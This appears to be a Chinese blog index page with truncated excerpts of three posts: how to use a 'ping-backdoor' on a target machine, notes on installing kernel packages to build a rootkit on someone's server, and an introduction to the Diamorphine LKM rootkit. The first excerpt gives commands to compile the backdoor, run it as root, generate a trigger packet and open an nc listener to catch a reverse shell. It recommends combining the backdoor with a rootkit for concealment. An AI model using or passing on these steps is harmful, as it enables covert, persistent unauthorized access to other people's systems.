ping-backdoor使用,配合Rootkit使用效果更佳

#使用方法:1.把下列代码复制到目标机器中,保存名为 ping-backdoor.c 2.使用gcc编译●gcc -static -o ping-backdoor ping-backdoor.c●strip ping-backdoor注:如果这一步出现错误,可以尝试安装静态编译解决 yum install glibc-static 3.在目标机器中运行,要以root权限开启后门●./ping-backdoor 4.在接收反弹的电脑上使用magic.py生成范本数据包,用来ping的时候填充,促发反弹●python3 magic.py reverse_ip reverse_port //类似这样 ac1f07931a0a2a7e 5.在反弹的电脑上开启nc监听●nc -lvvp reverse_port //要和使用magic.py时候填写的端口一致 6.在反弹的电脑上ping 带有后门的主 […]

查看全部


Rootkit安装踩坑记

首先先执行:yum update && yum upgrade 1.查看对方服务器的内核版本:uname -a 2.查找对应的内核版本和内核开发包,到下列地址搜对应的版本:kernel(内核) rpm包下载链接:ftp://ftp.pbone.net/mirror/ftp.scientificlinux.org/linux/scientific/7.0/x86_64/updates/security/kernel-xxx.xxx.xxxx..xxxx.x86_64.rpm kernel-devel(内核开发) rpm包下载链接:ftp://ftp.riken.jp/Linux/cern/centos/7/updates/x86_64/repoview/kernel-devel.html 3.kernel 直接安装即可:rpm -ivh kernel-xx.xxx.xxx.x […]

查看全部


rootkit LKM之 “Diamorphine”

序:这个标题但愿不会被天朝给Kill掉—- 善哉。   一:基础姿势了解一下 好久没认真写点东西了,来讲一讲rootkit中最受欢迎的一种LKM(loadable Kernel module  能加载的内核模块),说白了,就是编译一个模块,然后用命令insmod 将指定的模块加载到内核中,Linux有些功能是以模块的方式存在的,在需要使用时才载入kernel的。好处是kernel轻装上阵,即需要什么拿什么。这类模块一般都是设备驱动程序。 二:“Diamorphine”使用 Diamorphine是Linux Kernels 2.6.x / 3.x / 4.x的可加载模块。 下面测试基于4.4-kernel的ubuntu Diamorphine git地址 —-传送门 git下来后make 使用说明: 1.make安装完之后加载模块,还必须以root权限运行 […]

查看全部